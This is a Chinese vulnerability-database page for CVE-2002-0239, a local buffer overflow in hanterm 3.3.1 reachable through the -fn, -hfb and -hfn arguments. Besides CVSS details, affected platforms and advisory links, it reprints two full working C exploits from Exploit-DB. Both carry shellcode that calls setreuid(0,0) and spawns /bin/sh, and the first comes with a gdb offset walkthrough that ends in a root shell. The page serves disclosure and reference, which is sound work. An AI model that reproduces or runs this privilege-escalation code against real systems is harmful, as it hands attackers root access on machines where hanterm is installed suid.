CVE-2002-0239
CVSS7.2
发布时间 :2002-05-29 00:00:00
修订时间 :2016-10-17 22:17:27
NMCOES    

[原文]Buffer overflow in hanterm 3.3.1 and earlier allows local users to execute arbitrary code via a long string in the (1) -fn, (2) -hfb, or (3) -hfn argument.


[CNNVD]Hanterm本地缓冲区溢出漏洞(CNNVD-200205-073)

        Hanterm 3.3.1及其更早版本存在缓冲区溢出漏洞。本地用户可以借助(1) -fn,(2) -hfb,or (3) -hfn参数中的超长字符串执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:hanterm:hanterm:3.3
cpe:/a:hanterm:hanterm:3.3.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0239
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0239
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200205-073
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:41.hanterm.asc
(UNKNOWN)  FREEBSD  FreeBSD-SA-01:41
http://marc.info/?l=bugtraq&m=101310874106455&w=2
(UNKNOWN)  BUGTRAQ  20020207 Overflow Vulnerabilities in hanterm
http://online.securityfocus.com/archive/1/255168
(UNKNOWN)  BUGTRAQ  20020207 another hanterm exploit
http://securitytracker.com/id?1001950
(UNKNOWN)  SECTRACK  1001950
http://www.debian.org/security/2002/dsa-112
(VENDOR_ADVISORY)  DEBIAN  DSA-112
http://www.iss.net/security_center/static/8109.php
(VENDOR_ADVISORY)  XF  hanterm-command-line-bo(8109)
http://www.securityfocus.com/bid/4050
(UNKNOWN)  BID  4050

- 漏洞信息

Hanterm本地缓冲区溢出漏洞
高危 缓冲区溢出
2002-05-29 00:00:00 2005-10-20 00:00:00
本地  
        Hanterm 3.3.1及其更早版本存在缓冲区溢出漏洞。本地用户可以借助(1) -fn,(2) -hfb,or (3) -hfn参数中的超长字符串执行任意代码。

- 公告与补丁

        Fixes available:
        Hanterm Hanterm 3.3.1
        

- 漏洞信息 (21280)

Hanterm 3.3 Local Buffer Overflow Vulnerability (1) (EDBID:21280)
linux local
2002-02-07 Verified
0 Xpl017Elz
N/A [点击下载]
source: http://www.securityfocus.com/bid/4050/info

Hanterm is a replacement for xterm which includes Hangul support, used for Korean language systems.

A buffer overflow error exists in hanterm. If it is called locally with a maliciously constructed parameter, it is possible to overflow a buffer. This can result in the return address of a stack frame being overwritten, and lead to the execution of arbitrary code.

As hanterm runs suid root on some systems, exploitation of this vulnerability may result in a local root compromise. 

/*
**
** How to exploit?
**
** [x82@xpl017elz x82]$ cp /usr/X11R6/bin/hanterm .
** [x82@xpl017elz x82]$ gdb -q hanterm
** (no debugging symbols found)...(gdb) r -display 61.xx.177.27:0 -fn `perl -e
** 'print "x"x80'`
**  
** Starting program: /home/noname/hanterm -display 61.xx.177.27:0 -fn `perl -e
** 'print "x"x80'`
** (no debugging symbols found)...(no debugging symbols found)...
** (no debugging symbols found)...(no debugging symbols found)...
** (no debugging symbols found)...(no debugging symbols found)...
** (no debugging symbols found)...
** Program received signal SIGSEGV, Segmentation fault.
** 0x80520e6 in strcpy () at ../sysdeps/generic/strcpy.c:30
** 30      ../sysdeps/generic/strcpy.c: �׷� �����̳� ���丮�� ���.
** (gdb) info reg $esp
** esp            0xbfffe6b8       -1073748296
** (gdb) x/80 0xbffffb00
** 0xbffffb00:     0x65746e61      0x2d006d72      0x70736964      0x0079616c
** 0xbffffb10:     0x332e3136      0x37312e37      0x37322e37      0x2d00303a
** 0xbffffb20:     0x78006e66      0x78787878      0x78787878      0x78787878
** 0xbffffb30:     0x78787878      0x78787878      0x78787878      0x78787878
** 0xbffffb40:     0x78787878      0x78787878      0x78787878      0x78787878
** 0xbffffb50:     0x78787878      0x78787878      0x78787878      0x78787878
** 0xbffffb60:     0x78787878      0x78787878      0x78787878      0x78787878
** 0xbffffb70:     0x00787878      0x5353454c      0x4e45504f      0x656c7c3d
**     ...             ...            ...              ...             ...
** 0xbffffc10:     0x2d2a2d36      0x3563736b      0x2e313036      0x37383931
** 0xbffffc20:     0x2d2c302d      0x6f6b2d2a      0x2d676964      0x6964656d
** 0xbffffc30:     0x722d6d75      0x726f6e2d      0x2d6c616d      0x2d38312d
** (gdb)                
** 
** Buffer Structure
**
** [ data addr: 80byte ] + [ ebp addr: 4byte ] + [ ret addr: 4byte ] = 88byte
**
** The return until the address the whole it contains and,
** it puts in an option. 
**
** [x82@xpl017elz x82]$ ./exploit
** 
** XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm exploit
** Default: [ data addr ] + [ ebp addr ] + [ ret addr ] = 88byte
** 
**                         Exploit made by Xpl017Elz
** 
** Display HOST_IP: 255.255.255.255:0
** Jumping Address: 0xbffffb74
** 
** Segmentation fault
** [x82@xpl017elz x82]$  
**
** It calculates the offset. 
** Namely, when 0xbffffb20 from 0xbffffb70 until it catches in between, 
** it will be suitable.
**
** [x82@xpl017elz x82]$ ./exploit -a 61.xx.177.27:0 -o 2370 -b 88
** 
** XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm exploit
** Default: [ data addr ] + [ ebp addr ] + [ ret addr ] = 88byte
** 
**                         Exploit made by Xpl017Elz
** 
** Display HOST_IP: 61.xx.177.27:0
** Jumping Address: 0xbffffb26
** 
** bash#        
**
** Ooops! it's rootshell :-)
**
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>. 
** My World: http://x82.i21c.net
**
*/

#include <stdio.h>
#include <stdlib.h>

#define NOP 0x90
#define DFOFS 2400 
#define DFIP "255.255.255.255:0"
#define DFBUF 88 

/*
** [ data addr: 80byte ] + [ ebp addr: 4byte ] + [ ret addr: 4byte ] = 88byte
*/

char shellcode[] = /* 53byte shellcode */
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80" /* setreuid(0,0); */
"\xeb\x1d\x5e\x89\x76\x08\x31\xc0\x88\x46"
"\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
"\x08\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd"
"\x80\xe8\xde\xff\xff\xff/bin/sh";

unsigned long sp(void) {
__asm__("movl %esp,%eax");
}

main(int argc, char *argv[]) {

int rufp, fpru, jobst,
    ferbuf, num=DFBUF,
    ofs=DFOFS;

long addr;

char buffer[2000],
     hoip[] = DFIP;

extern char *optarg;

banrl();

while ((jobst = getopt(argc, argv, "a:o:b:")) !=EOF)
switch (jobst) {
case 'a': strcpy(hoip, optarg);
break;
case 'o': ofs = atoi(optarg);
break;
case 'b': num = atoi(optarg);
break;
case '?': usages(argv[0]); 
exit(0);
}

printf(" Display HOST_IP: %s\n",hoip);
addr = sp() +ofs; // -ofs;
printf(" Jumping Address: %p\n\n",addr); 
ferbuf = num - sizeof(shellcode) -4;

bzero(&buffer,2000);
for(rufp=0; rufp<=ferbuf; rufp++) {
buffer[rufp] = NOP;
}

for(fpru=0; fpru<=52; fpru++) {
buffer[rufp++] = shellcode[fpru];
}
buffer[rufp++] =     addr & 0xff;
buffer[rufp++] = addr>> 8 & 0xff;
buffer[rufp++] = addr>>16 & 0xff;
buffer[rufp++] = addr>>24 & 0xff;

execl("/usr/X11R6/bin/hanterm", "hanterm",
"-display", hoip, "-fn", buffer, NULL);  

exit(0);

}

usages(char *var) {

printf("\n Usage:\n
 %s -a [host_ip:0] -o [offset] -b [buffer size] (data addr~ return addr)\n",var);
printf(" Default: %s -a 61.xx.177.27:0 -o 2400 -b 88\n\n",var); 

}

banrl() {

printf("\n XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm exploit\n");
printf(" Default: [ data addr ] + [ ebp addr ] + [ ret addr ] = 88byte\n\n");
printf("\t\t\t Exploit made by Xpl017Elz\n\n");

}

		

- 漏洞信息 (21281)

Hanterm 3.3 Local Buffer Overflow Vulnerability (2) (EDBID:21281)
linux local
2002-02-07 Verified
0 xperc
N/A [点击下载]
source: http://www.securityfocus.com/bid/4050/info
 
Hanterm is a replacement for xterm which includes Hangul support, used for Korean language systems.
 
A buffer overflow error exists in hanterm. If it is called locally with a maliciously constructed parameter, it is possible to overflow a buffer. This can result in the return address of a stack frame being overwritten, and lead to the execution of arbitrary code.
 
As hanterm runs suid root on some systems, exploitation of this vulnerability may result in a local root compromise. 

/* hanterm_exp.c
 *
 * local exploit for hanterm
 *  .. tested in TurboLinux Server 6.5 (Japan)
 *
 * thanks my Japanese friend kaju(kaijyu)
 * and Japanese hacker UNYUN.
 *
 *                  by xperc@hotmail.com
 *                         2002/02/07
 */

#include <stdio.h>

#define NOP		0x90
#define MAXBUF		88
#define RETOFS		84
#define SHELL_OFS 	22
#define ESP_OFS 	-0xe38

unsigned int get_esp()
{
	__asm__("mov %esp,%eax");
}

int main()
{
        static char shellcode[]={
            0x31,0xc0,0x31,0xdb,0xb0,0x17,0xcd,0x80,

0x31,0xc0,0x31,0xdb,0xb0,0x2e,0xcd,0x80,
            0xeb,0x18,0x5e,0x89,0x76,0x08,0x31,0xc0,

0x88,0x46,0x07,0x89,0x46,0x0c,0xb0,0x0b,
            0x89,0xf3,0x8d,0x4e,0x08,0x8d,0x56,0x0c,
            0xcd,0x80,0xe8,0xe3,0xff,0xff,0xff,0x2f,
            0x62,0x69,0x6e,0x2f,0x73,0x68,0x00
        };
        unsigned int retadr;
	char buf[MAXBUF];
        int i;

	memset(buf,NOP,MAXBUF);

	retadr=get_esp()+ESP_OFS;
	printf("Jumping address = %p\n",retadr);

	for(i=RETOFS-32;i<RETOFS+32;i+=4){
		buf[i]	=retadr&0xff;
		buf[i+1]=(retadr>>8)&0xff;
		buf[i+2]=(retadr>>16)&0xff;
		buf[i+3]=(retadr>>24)&0xff;
	}
	strncpy(buf+SHELL_OFS,shellcode,strlen
(shellcode));
	//buf[MAXBUF-1]='\0';       faint!:-(
	execl("/usr/bin/X11/hanterm","hanterm","-
fn",buf,(char *)0);
}

		

- 漏洞信息

14336
hanterm Multiple Command Parameter Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Third-Party Solution
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2002-02-07 Unknow
2002-02-07 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Hanterm Local Buffer Overflow Vulnerability
Boundary Condition Error 4050
No Yes
2002-02-07 12:00:00 2009-07-11 10:56:00
Discovered by xperc <xperc@hotmail.com>.

- 受影响的程序版本

Hanterm Hanterm 3.3.1
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
Hanterm Hanterm 3.3
+ Turbolinux Turbolinux 7.0
+ Turbolinux Turbolinux 6.5

- 漏洞讨论

Hanterm is a replacement for xterm which includes Hangul support, used for Korean language systems.

A buffer overflow error exists in hanterm. If it is called locally with a maliciously constructed parameter, it is possible to overflow a buffer. This can result in the return address of a stack frame being overwritten, and lead to the execution of arbitrary code.

As hanterm runs suid root on some systems, exploitation of this vulnerability may result in a local root compromise.

- 漏洞利用

An exploit has been provided by xperc &lt;xperc@hotmail.com&gt;:

- 解决方案

Fixes available:


Hanterm Hanterm 3.3.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站